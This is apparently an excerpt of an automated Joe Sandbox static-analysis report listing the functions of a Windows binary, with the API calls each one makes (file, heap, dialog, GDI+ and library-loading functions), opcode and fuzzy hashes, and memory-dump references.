                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeLibraryProc
                                                                                              • String ID:
                                                                                              • API String ID: 3013587201-0
                                                                                              • Opcode ID: 706d4ccc6848637977d0236fa7fd03b156cc120f834627f0d93df2397a08e844
                                                                                              • Instruction ID: 1729250ae52a2255377f5a8f00b12f5e68745ed6478eeb9f0b24cab55e8e6af2
                                                                                              • Opcode Fuzzy Hash: 706d4ccc6848637977d0236fa7fd03b156cc120f834627f0d93df2397a08e844
                                                                                              • Instruction Fuzzy Hash: 0911B63AA006159FDF22CFA4EC80AAA73B5FF8D3607240269E905DB254E730DD42CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B110 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00A2B157
                                                                                              • GetLastError.KERNEL32 ref: 00A2B164
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 74cfc2eea0c3a30931b42e0168a1500be407fdc796d92bb8e9fe00ece9e95028
                                                                                              • Instruction ID: 772b57039368a27274a32ef82e9c9c200a4d4a18356834bd3d4c7acd2b5f801e
                                                                                              • Opcode Fuzzy Hash: 74cfc2eea0c3a30931b42e0168a1500be407fdc796d92bb8e9fe00ece9e95028
                                                                                              • Instruction Fuzzy Hash: 9911E131610720AFE725CB6CE854BAAB3F9BB04360F604738E1A2935D0E770EE55C760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3BFB3 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A2D6A7: _wcslen.LIBCMT ref: 00A2D6AF
                                                                                                • Part of subcall function 00A33338: _wcslen.LIBCMT ref: 00A33340
                                                                                                • Part of subcall function 00A33338: _wcslen.LIBCMT ref: 00A33351
                                                                                                • Part of subcall function 00A33338: _wcslen.LIBCMT ref: 00A33361
                                                                                                • Part of subcall function 00A33338: _wcslen.LIBCMT ref: 00A3336F
                                                                                                • Part of subcall function 00A33338: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00A2C844,?,?,00000000,?,?,?), ref: 00A3338A
                                                                                                • Part of subcall function 00A3BC19: SetCurrentDirectoryW.KERNELBASE(?,00A3BFF6,00A71890,00000000,00A72892,00000006), ref: 00A3BC1D
                                                                                              • _wcslen.LIBCMT ref: 00A3C00F
                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,00A72892,00000006), ref: 00A3C048
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                                                                              • String ID:
                                                                                              • API String ID: 1016385243-0
                                                                                              • Opcode ID: dbfefc16725a43d2be807564dc19dfd49a05cc2c8bba6e814e74888012645faa
                                                                                              • Instruction ID: 1728dd765e4a95c437fce24707e53e0096b5a73aad5067110a9a7f717d698fcb
                                                                                              • Opcode Fuzzy Hash: dbfefc16725a43d2be807564dc19dfd49a05cc2c8bba6e814e74888012645faa
                                                                                              • Instruction Fuzzy Hash: 83012171D00258AADF21ABA4DE0BEDF72FCAF08740F004465F649F6195EAB496848BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4A6A4 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A4A6C5
                                                                                                • Part of subcall function 00A4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00A630C4,00A2187A,?,?,00000007,?,?,?,00A213F2,?,00000000), ref: 00A4A701
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              • Opcode ID: b439ac8ef7580bd9a2af1199a58b3ea675a65daee1f5d8fafd4af6883c1b9469
                                                                                              • Instruction ID: 291382c90c1455f2761e0925c27a7b7dbd077463ea74576a2fd4bb6ec44972e2
                                                                                              • Opcode Fuzzy Hash: b439ac8ef7580bd9a2af1199a58b3ea675a65daee1f5d8fafd4af6883c1b9469
                                                                                              • Instruction Fuzzy Hash: ECF0F63E2C1111A7DB212B26AC01F6BB7689FF1BB1F1B4015F8199A091EF20CC40956B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A323BD Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00A323CA
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00A323D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 3d367eb89d6b1250b401b71f3d85828c132d60fcb502bb9b85dbd0a77141a389
                                                                                              • Instruction ID: bdcbd651b49d0d60e825d257ba08a836b5e7a8f2290f098665dfd8c439d9c1de
                                                                                              • Opcode Fuzzy Hash: 3d367eb89d6b1250b401b71f3d85828c132d60fcb502bb9b85dbd0a77141a389
                                                                                              • Instruction Fuzzy Hash: C2E0DF33B10205AB9F098BF4AC05AEFB7ECEA48219B20417AB603E7100F978DD4647A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2F968 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadStringW.USER32(?,?,00000200,?), ref: 00A2F998
                                                                                              • LoadStringW.USER32(?,?,00000200), ref: 00A2F9AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString
                                                                                              • String ID:
                                                                                              • API String ID: 2948472770-0
                                                                                              • Opcode ID: b2f1657fcac287caf362c435f8cb3f6cb801ca1279bbcd2ed9cc23a6211c5164
                                                                                              • Instruction ID: 8fe803cf5c0c2434154455ed354944caf31d9e3e9b661128db484e77c4eccf80
                                                                                              • Opcode Fuzzy Hash: b2f1657fcac287caf362c435f8cb3f6cb801ca1279bbcd2ed9cc23a6211c5164
                                                                                              • Instruction Fuzzy Hash: 23F09E36100115BBDF119FA5EC08DAB7F7AFF067917014435FD0496130D6328965DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B8E6 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B8FA
                                                                                                • Part of subcall function 00A2CF32: _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B92B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: d3d23a983359e93ed0abc7d68385c1524748306eff0c17ec7440cb766a846d42
                                                                                              • Instruction ID: 18ae0c71a8b9107c14013941176448e82f40432d4e6033e8f59ba836ad4970c1
                                                                                              • Opcode Fuzzy Hash: d3d23a983359e93ed0abc7d68385c1524748306eff0c17ec7440cb766a846d42
                                                                                              • Instruction Fuzzy Hash: 63F0A931114219BBDF119FA4DC00BDA376CBB183CAF008060BA44D62A4DB31DD959A20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B470 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,00000000,?,00A2A438,?,?,?,?,00A2892B,?,?,?,00A5380F,000000FF), ref: 00A2B481
                                                                                                • Part of subcall function 00A2CF32: _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,00A2A438,?,?,?,?,00A2892B,?,?,?,00A5380F,000000FF), ref: 00A2B4AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              • Opcode ID: 9e561c23d31988d0f31df87151b065d622c420ccf8b2d3987d4ae924510d8241
                                                                                              • Instruction ID: 78ccc68b384e7047fba242566922a685b41b12f77cc47f6d6aee6bb2c839eb92
                                                                                              • Opcode Fuzzy Hash: 9e561c23d31988d0f31df87151b065d622c420ccf8b2d3987d4ae924510d8241
                                                                                              • Instruction Fuzzy Hash: 9FE09232550359ABEB01ABA4DC41FDA375DBB08386F444031BA45D20A5DB64DDC59A60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3BD81 Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00A5380F,000000FF), ref: 00A3BDB5
                                                                                              • OleUninitialize.OLE32(?,?,?,?,00A5380F,000000FF), ref: 00A3BDBA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: 30bb4075e24218f8e4a7fe9f6c913866c13f1e6e70fbc7e462af9c5e07a30081
                                                                                              • Instruction ID: ba0e1f4f738adf5aec74776e0f6db65f01e5fed0781a643a71c2df706ea22773
                                                                                              • Opcode Fuzzy Hash: 30bb4075e24218f8e4a7fe9f6c913866c13f1e6e70fbc7e462af9c5e07a30081
                                                                                              • Instruction Fuzzy Hash: 36E06572504650EFCB14DB58DC09B49FBA9FB88B24F104226F41593760CB746801CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F002 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00A3F02C
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00A3F043
                                                                                                • Part of subcall function 00A3C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3C769
                                                                                                • Part of subcall function 00A3C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3C77A
                                                                                                • Part of subcall function 00A3C758: IsDialogMessageW.USER32(0001046C,?), ref: 00A3C78E
                                                                                                • Part of subcall function 00A3C758: TranslateMessage.USER32(?), ref: 00A3C79C
                                                                                                • Part of subcall function 00A3C758: DispatchMessageW.USER32(?), ref: 00A3C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: bd38b546bb9da6a5665fcaa10649b424f62964a3d8abc2f70da3845c370c0a8f
                                                                                              • Instruction ID: 16e490f2c5d8d05dca0d39991c99309bab30f5db98ea26d672eeaec8fd2e5a35
                                                                                              • Opcode Fuzzy Hash: bd38b546bb9da6a5665fcaa10649b424f62964a3d8abc2f70da3845c370c0a8f
                                                                                              • Instruction Fuzzy Hash: A4E09B7641425C3ADF01E7A5DD0EF9A36AC5B147C9F040461F641A60A2D6B5D5118F62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B4D3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00A2B4CA,?,00A28042,?), ref: 00A2B4E4
                                                                                                • Part of subcall function 00A2CF32: _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,00A2B4CA,?,00A28042,?), ref: 00A2B510
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: d7dcdd5c5f3dd9cf5ef2808b6dd1d856dbc23b545526593d082abd30c88f6c22
                                                                                              • Instruction ID: fea0d76845b335538ec4a7152a577bbf84634a1d6c5fb2099c1af53a4cfd46a4
                                                                                              • Opcode Fuzzy Hash: d7dcdd5c5f3dd9cf5ef2808b6dd1d856dbc23b545526593d082abd30c88f6c22
                                                                                              • Instruction Fuzzy Hash: 2AE092315103686BDB20EB68EC04BDA7758BB093E6F000170FE46E71E5D774AD818AE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A31B3B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: ef2351ecbefcc49d13dcf062b91f21fd6efc7c8536066b5127477af5fe63cdb3
                                                                                              • Instruction ID: 08f87f63e830a621ea70f20f10fd7d9e4d1d14abb6a8fc6200c5f56e918a2676
                                                                                              • Opcode Fuzzy Hash: ef2351ecbefcc49d13dcf062b91f21fd6efc7c8536066b5127477af5fe63cdb3
                                                                                              • Instruction Fuzzy Hash: ADE048769103286BDB119BE5DD04FDA77ACFF0D3C2F0400657645D2048DA74DA84CBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3B3C8 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A3B3E9
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A3B3F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: 0c489961e76aded5db2a2c5d7d4f2ebeb5982a5be946a34620b4aa38f016408d
                                                                                              • Instruction ID: 0219a41bbf4d75b281c18b45d370870614affd6c95e4fb0f1ee1528f4884611c
                                                                                              • Opcode Fuzzy Hash: 0c489961e76aded5db2a2c5d7d4f2ebeb5982a5be946a34620b4aa38f016408d
                                                                                              • Instruction Fuzzy Hash: 89E0ED71910618EFCB10DF99C545699B7F8EF08355F20806AF99597600E374AE449BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A43D1C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A43D3A
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A43D45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              • String ID:
                                                                                              • API String ID: 1660781231-0
                                                                                              • Opcode ID: 1f6a4c5d5f769eff160a2e7744c07ae1026c1c0efaa8b1cec086441fe3b74b98
                                                                                              • Instruction ID: e58d2c20b9fbbbc8848859b2d9c5956eb3d180019ccb6a1fb44545fe48d26182
                                                                                              • Opcode Fuzzy Hash: 1f6a4c5d5f769eff160a2e7744c07ae1026c1c0efaa8b1cec086441fe3b74b98
                                                                                              • Instruction Fuzzy Hash: DFD0223FC08B02349C0833B82E0398B1364BAE5B707B01F86E0309A0C1EE188A056121
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A212D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
